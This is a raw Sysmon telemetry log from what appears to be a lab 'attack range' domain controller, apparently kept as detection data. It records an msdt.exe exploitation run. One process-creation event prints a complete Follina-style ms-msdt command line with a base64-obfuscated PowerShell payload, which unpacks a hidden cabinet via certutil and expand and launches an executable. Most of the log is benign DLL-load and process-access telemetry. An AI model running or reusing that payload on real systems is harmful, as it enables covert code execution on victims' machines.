Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 10341000x800000000000000098969Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000098968Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098967Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000098966Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098965Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-A43E-6294-D800-000000005502}28845852C:\Windows\system32\csrss.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098964Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
Event ID 10 (ProcessAccess), EventRecordID 98964, Microsoft-Windows-Sysmon/Operational, win-dc-ctus-attack-range-994.attackrange.local
RuleName: -
UtcTime: 2022-05-30 13:04:14.749
SourceProcessGUID: {326FD73D-AAC7-6294-6108-000000005502}
SourceProcessId: 5488
SourceThreadId: 5948
SourceImage: C:\Windows\system32\cmd.exe
TargetProcessGUID: {326FD73D-C0CE-6294-360B-000000005502}
TargetProcessId: 6728
TargetImage: C:\WINDOWS\system32\msdt.exe
GrantedAccess: 0x1fffff
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

Event ID 1 (ProcessCreate), EventRecordID 98963, Microsoft-Windows-Sysmon/Operational, win-dc-ctus-attack-range-994.attackrange.local
RuleName: -
UtcTime: 2022-05-30 13:04:14.728
ProcessGuid: {326FD73D-C0CE-6294-360B-000000005502}
ProcessId: 6728
Image: C:\Windows\System32\msdt.exe
FileVersion: 10.0.14393.0 (rs1_release.160715-1616)
Description: Diagnostics Troubleshooting Wizard
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: msdt.exe
CommandLine: "C:\WINDOWS\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"
CurrentDirectory: C:\Program Files\ansible\sysmon\
User: ATTACKRANGE\Administrator
LogonGuid: {326FD73D-A440-6294-2753-0E0000000000}
LogonId: 0xe5327
TerminalSessionId: 2
IntegrityLevel: High
Hashes: MD5=BB98CE2BD520AC69CB3D2F830974CABE,SHA256=C1237BDD2B574C1CBBB4A0D990773BBED5B6FE3BD14F8011C0E79F9CDDCA2B4E,IMPHASH=5D314604CE5F7FF83060B18832AA0D35
ParentProcessGuid: {326FD73D-AAC7-6294-6108-000000005502}
ParentProcessId: 5488
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "cmd.exe" /s /k pushd "C:\Program Files\ansible\sysmon"
13:04:34.422{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099135Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.422{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8,IMPHASH=B53F82B33CA6ABD6251152A46E5FF78CtrueMicrosoft WindowsValid 734700x800000000000000099134Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEACC.DLLMD5=1B04659F0A22BFE9142B6AD36467ACEA,SHA256=67BC7C19D71FB98A7B5882B0F2BFC8F2E4491B4ACBE23EE545D54FFCAEC808E9,IMPHASH=427F18493D540CBF4092BD07A97BE51FtrueMicrosoft WindowsValid 
734700x800000000000000099133Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\atlthunk.dll10.0.14393.2969 (rs1_release.190503-1820)atlthunk.dllMicrosoft® Windows® Operating SystemMicrosoft Corporationatlthunk.dllMD5=BECA5E9FA540246333036919A57B7AEF,SHA256=62C24B274B38A88C83EE122CB30142C2135953C1A26582AD003512B238CB7FC9,IMPHASH=E86BAF1A171668A11110B8975A3BDE27trueMicrosoft WindowsValid 734700x800000000000000099132Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8,IMPHASH=B53F82B33CA6ABD6251152A46E5FF78CtrueMicrosoft WindowsValid 734700x800000000000000099131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750A,IMPHASH=ADB9F71ACD4F7D3CF761AB6C59A7F1E5trueMicrosoft WindowsValid 734700x800000000000000099130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationMSCTF.DLLMD5=E2374A214A9F0C8347C29EBDE3447986,SHA256=F2260FE7E0C4E92D49CF0F550E2A1B3D3F1D2D76E6F5C8F16B0E16B6117D9EE1,IMPHASH=EB898F83C3A5D6877A523BC64B41CB06trueMicrosoft WindowsValid 734700x800000000000000099129Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\msftedit.dll10.0.14393.4704 (rs1_release.211004-1917)Rich Text Edit Control, v8.5Microsoft® Windows® Operating SystemMicrosoft CorporationMsftEdit.DLLMD5=76AA789092145B52D12BF1B1E8658294,SHA256=8116A9DDDA0090327E537D1C87EE3C6A1716B6228AD20F71665F0E493ACD47EF,IMPHASH=7C36F76BEB38B735155D539BEBF60532trueMicrosoft WindowsValid 10341000x800000000000000099128Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-A254-6294-1600-000000005502}13003216C:\Windows\system32\svchost.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099127Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.406{326FD73D-A254-6294-1600-000000005502}13001356C:\Windows\system32\svchost.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000099126Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.391{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-C0E2-6294-370B-000000005502}5132C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099125Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.391{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002A,IMPHASH=C852E8FD14D356C81F834E318EEAD7FAtrueMicrosoft WindowsValid 734700x800000000000000099124Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.391{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft 
Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33trueMicrosoft WindowsValid 734700x800000000000000099123Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.391{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\dui70.dll10.0.14393.4169 (rs1_release.210107-1130)Windows DirectUI EngineMicrosoft® Windows® Operating SystemMicrosoft CorporationDUI70.DLLMD5=C3DC010AC7F5880CC7BE626566FC4130,SHA256=3ED6E9D0AF769B0BFBE94DFF4CC07A94A81271133FBB60C9EB02676C92FFB87E,IMPHASH=E76D3161885DD9D13E8514AFC7BF3853trueMicrosoft WindowsValid 734700x800000000000000099122Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\duser.dll10.0.14393.0 (rs1_release.160715-1616)Windows DirectUser EngineMicrosoft® Windows® Operating SystemMicrosoft CorporationDUser.DLLMD5=42D5E1F8641E9DCEE0D8751F6F7A8961,SHA256=9168110EF404BF179888AF4A0F02B2817F020BFB16351778F2DDD6915C92F190,IMPHASH=9134DC493583245CFD7E3B68926C19D0trueMicrosoft WindowsValid 734700x800000000000000099121Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\cabinet.dll5.00 (rs1_release.160715-1616)Microsoft® Cabinet File APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcabinet.dllMD5=08A4A2712DB2AE10E483FB74E46B0E73,SHA256=EEB32E3E4256CC9935227ACD5BA576B75F1F6FE3C818D2127513CB22F823FECB,IMPHASH=536E202FBC448C2C3B40D60D87620951trueMicrosoft WindowsValid 734700x800000000000000099120Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\winhttp.dll10.0.14393.5006 (rs1_release.220301-1704)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=54658E22186450946F304FE8BB408BBB,SHA256=1877859D1B72E18784982F4254C8DAE24F15186D3CA74680E7915E53D50800A1,IMPHASH=35501E61EE90F9745FCEA0F1F844350FtrueMicrosoft WindowsValid 734700x800000000000000099119Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\crypt32.dll10.0.14393.4946 (rs1_release.220131-0721)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=341C44C830FB5D4FA58EF6276D9D2511,SHA256=988C82047689A625BA54959D2DB401A6891B9C00CF8A262842FBA2F032519283,IMPHASH=42B269CD88D7BD841B43BB1788792A62trueMicrosoft WindowsValid 734700x800000000000000099118Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242,IMPHASH=B6562243FBF394F03046E917C719260FtrueMicrosoft WindowsValid 734700x800000000000000099117Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\wer.dll10.0.14393.4704 (rs1_release.211004-1917)Windows Error Reporting DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationwer.dllMD5=7E027B814172825204990B59AA353DB6,SHA256=F6F12530FE0312540C3C1310D618EE4D9005199E90E1BB9B385CA086C54E20C1,IMPHASH=D4255358570CE65AE9390E07B2795ADCtrueMicrosoft WindowsValid 734700x800000000000000099116Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x800000000000000099115Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\wintrust.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft Trust Verification APIsMicrosoft® Windows® Operating SystemMicrosoft CorporationWINTRUST.DLLMD5=55FCE44E89BDA2444619661FE50F43EE,SHA256=420CACA0D821E7E9F1D1E683E9899BC2F6D5A4AA06C8D4BB23335DD9490CC0F8,IMPHASH=8B8383FC3FA03C92F859A2AF899A52ADtrueMicrosoft WindowsValid 734700x800000000000000099114Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=0DB1A588A248E852AD781AE14333A5C6,SHA256=6F9C36C2663B90439A1AEE74855C521FCBBDB8C7B88382C9464906F1691F65F6,IMPHASH=06716A63D3E6F97CB489B0D6810B3519trueMicrosoft WindowsValid 734700x800000000000000099113Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12,IMPHASH=67E6A4C8E164C0229E3FF1626F1894C6trueMicrosoft WindowsValid 734700x800000000000000099112Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\atl.dll3.05.2284ATL Module for Windows XP (Unicode)Microsoft (R) Visual C++Microsoft CorporationATL.DLLMD5=C1B73181019C1E1F28F4161B5F198B7F,SHA256=C3678504437D23910C18D3680B05B4E819A2229BDD0E1E0567186C70D814560D,IMPHASH=5500EF6AAEED0FAA2DE0F3B65E67DE20trueMicrosoft WindowsValid 734700x800000000000000099111Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000099110Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.378{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000099109Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000099108Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5,IMPHASH=C3F4A4DA2950075F09DD008B60FF567CtrueMicrosoft WindowsValid 734700x800000000000000099107Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.359{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899,IMPHASH=9060609FCB6C4120D4517877408A4A46trueMicrosoft WindowsValid 
